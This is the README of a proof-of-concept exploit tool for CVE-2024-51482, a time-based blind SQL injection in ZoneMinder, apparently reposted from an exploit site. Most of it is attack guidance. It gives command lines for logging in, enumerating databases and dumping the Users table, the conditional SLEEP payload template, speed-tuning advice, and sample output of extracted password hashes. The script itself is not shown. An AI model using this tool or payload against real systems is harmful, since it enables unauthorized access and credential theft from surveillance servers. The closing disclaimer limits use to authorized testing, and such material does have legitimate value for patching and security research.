Share
## https://sploitus.com/exploit?id=3A2D8152-90D2-5A38-88F5-8A4B7A6718B2
# CVE-2024-51482-PoC
Authenticated time-based blind SQL injection exploit for **ZoneMinder v1.37.* <= 1.37.64**
## ๐ฏ Overview
This is a proof-of-concept exploit for CVE-2024-51482, a time-based blind SQL injection vulnerability in ZoneMinder's event management functionality. The exploit requires authentication and uses conditional SLEEP queries to extract data from the database.
## โจ Features
- โ
**Authenticated exploitation** - Login with credentials or session cookie
- โ
**Length detection** - Binary search to find exact string length before extraction
- โ
**Parallel extraction** - Multi-threaded character extraction for speed
- โ
**sqlmap-style options** - Enumerate databases, tables, columns, and dump data
- โ
**Safe defaults** - 3s delay, 5 threads for high accuracy
- โ
**Progress tracking** - Real-time extraction progress with verbose mode
- โ
**Clean output** - Formatted table display for dumped data
## ๐ Requirements
```bash
pip install requests
```
## ๐ Quick Start
### Default Mode - Dump Credentials
```bash
python3 poc.py -t example.local -u admin -p password
```
### With Session Cookie
```bash
python3 poc.py -t example.local --cookie 'ZMSESSID_value'
```
### Verbose Mode
```bash
python3 poc.py -t example.local -u admin -p password -v
```
## ๐ Usage
### Enumerate Databases
```bash
python3 poc.py -t example.local -u admin -p password --dbs
```
### Enumerate Tables
```bash
python3 poc.py -t example.local -u admin -p password -D zm --tables
```
### Enumerate Columns
```bash
python3 poc.py -t example.local -u admin -p password -D zm -T Users --columns
```
### Dump Specific Table
```bash
python3 poc.py -t example.local -u admin -p password -D zm -T Users --dump
```
## โ๏ธ Options
```
Required:
-t, --target TARGET Target URL (IP, hostname, or full URL)
Authentication:
-u, --username USERNAME Username for authentication
-p, --password PASSWORD Password for authentication
--cookie COOKIE Session cookie (ZMSESSID)
Enumeration:
--dbs Enumerate databases
-D, --database DATABASE Database to use
--tables Enumerate tables
-T, --table TABLE Table to use
--columns Enumerate columns
--dump Dump table data
Performance:
--delay DELAY Time delay in seconds (default: 3, safe)
--threads THREADS Number of threads (default: 5, safe)
-v, --verbose Show extraction progress
```
## ๐๏ธ Performance Tuning
### Safe Mode (Recommended)
```bash
python3 poc.py -t example.local -u admin -p password --delay 3 --threads 5
```
- **Speed**: ~2-3 minutes per password hash
- **Accuracy**: โ
High
### Fast Mode (May have errors)
```bash
python3 poc.py -t example.local -u admin -p password --delay 1 --threads 20
```
- **Speed**: ~30-60 seconds per password hash
- **Accuracy**: โ ๏ธ May produce incorrect characters
## ๐ Example Output
```
[*] Target: http://example.local
[*] Delay: 3s | Threads: 5
[+] Authenticated as admin
[*] Testing vulnerability...
[+] Target is VULNERABLE!
[*] Default mode: Dumping zm.Users credentials...
[*] Dumping data from 'zm.Users'...
[+] Extracted: admin
[+] Extracted: $2y$10$cmytVWFRnt1XfqsItsJRVe/ApxWxcIFQcURnm5N.rhlULwM0jrtbm
[+] Extracted: john
[+] Extracted: $2y$10$prZGnazejKcaLq9bKNexXOglBSqOl1hq07LW7AJ/QNqZolbXKfFG.
====================================================================================
| Username | Password |
====================================================================================
| admin | $2y$10$cmytVWFRnt1XfqsItsJRVe/ApxWxcIFQcURnm5N.rhlULwM0jrtbm |
| john | $2y$10$prABlsrtyjkiWv5bKNexXOgLyQaok0hq07LW7AJ/QNqZolbXKfFG. |
====================================================================================
[+] 2 entries dumped
```
## ๐ง How It Works
1. **Authentication** - Logs in with credentials or uses provided session cookie
2. **Vulnerability Test** - Confirms target is vulnerable with simple SLEEP payload
3. **Length Detection** - Uses binary search to find exact string length
4. **Parallel Extraction** - Extracts all character positions simultaneously
5. **Data Display** - Formats results in clean table
### Payload Format
The exploit uses sqlmap-style conditional SLEEP:
```sql
1 AND (SELECT 1 FROM (SELECT(SLEEP(3-(IF(condition,0,3)))))test)
```
- **TRUE condition**: No delay (0 seconds)
- **FALSE condition**: Full delay (3 seconds)
## ๐ Troubleshooting
### Inaccurate Results
If you get wrong characters (e.g., `$` becomes `8`):
```bash
# Increase delay and reduce threads
python3 poc.py -t example.local -u admin -p password --delay 4 --threads 3
```
### Too Slow
If extraction is too slow:
```bash
# Decrease delay and increase threads (may reduce accuracy)
python3 poc.py -t example.local -u admin -p password --delay 2 --threads 10
```
### No Data Found
If default `zm.Users` doesn't exist:
```bash
# Enumerate databases first
python3 poc.py -t example.local -u admin -p password --dbs
# Then enumerate tables
python3 poc.py -t example.local -u admin -p password -D database_name --tables
```
## ๐ CVE Information
- **CVE ID**: CVE-2024-51482
- **Affected Versions**: ZoneMinder v1.37.* <= 1.37.64
- **Fixed In**: v1.37.65
- **Vulnerability Type**: Time-based Blind SQL Injection
- **CVSS Score**: TBD
## โ ๏ธ Disclaimer
This tool is for **educational and authorized security testing purposes only**.
- Do not use this tool against systems you do not own or have explicit permission to test
- Unauthorized access to computer systems is illegal
- The author is not responsible for any misuse or damage caused by this tool
- Always obtain proper authorization before conducting security assessments
## ๐ References
- [NVD - CVE-2024-51482](https://nvd.nist.gov/vuln/detail/CVE-2024-51482)
- [ZoneMinder GitHub](https://github.com/ZoneMinder/zoneminder)
## ๐ License
This project is provided for educational purposes only. Use responsibly and ethically.
---
**โญ If you find this useful, please star the repository!**